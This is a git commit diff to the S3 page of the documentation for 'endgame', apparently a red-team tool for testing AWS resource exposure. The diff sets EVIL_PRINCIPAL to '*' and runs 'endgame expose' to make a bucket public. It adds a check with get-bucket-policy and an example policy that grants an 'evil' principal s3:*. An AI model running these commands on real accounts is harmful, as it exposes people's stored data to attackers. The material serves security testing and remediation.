Added S3 writeup

kmcquade · kmcquade · commit fa87ef662648 · 2021-02-13T16:16:41.000-05:00
diff --git a/docs/risks/s3.md b/docs/risks/s3.md
@@ -5,15 +5,38 @@
 * To expose the resource using `endgame`, run the following from the victim account:
 
 ```bash
-export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
+export EVIL_PRINCIPAL=*
 
 endgame expose --service s3 --name test-resource-exposure
 ```
 
+* To verify that the S3 bucket has been shared with the public, run the following from the victim account:
+
+```bash
+aws s3api get-bucket-policy --bucket test-resource-exposure
+```
+
+* Observe that the contents match the example shown below.
+
+
 ## Example
 
+The response of the `get-bucket-policy` command will return the below. Observe how the Evil Principal (`arn:aws:iam::999988887777:evil`) is granted full access to the S3 bucket.
+
+```json
+{
+    "Policy": "{\"Version\":\"2012-10-17\",\"Statement\":[{\"Sid\":\"AllowCurrentAccount\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::999988887777:evil\"},\"Action\":\"s3:*\",\"Resource\":[\"arn:aws:s3:::test-resource-exposure\",\"arn:aws:s3:::test-resource-exposure/*\"]}]}"
+}
+
+
+```
+
 ## Exploitation
 
+```
+TODO
+```
+
 ## Remediation
 
 > ‼️ **Note**: At the time of this writing, AWS Access Analyzer does **NOT** support auditing of this resource type to prevent resource exposure. **We kindly suggest to the AWS Team that they support all resources that can be attacked using this tool**. 😊
@@ -29,4 +52,5 @@ Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaini
 
 ## References
 
-- [aws s3api put-bucket-policy](https://docs.aws.amazon.com/cli/latest/reference/s3api/put-bucket-policy.html)
+- [aws s3api put-bucket-policy](https://docs.aws.amazon.com/cli/latest/reference/s3api/put-bucket-policy.html)
+- [aws s3api get-bucket-policy](https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-policy.html)
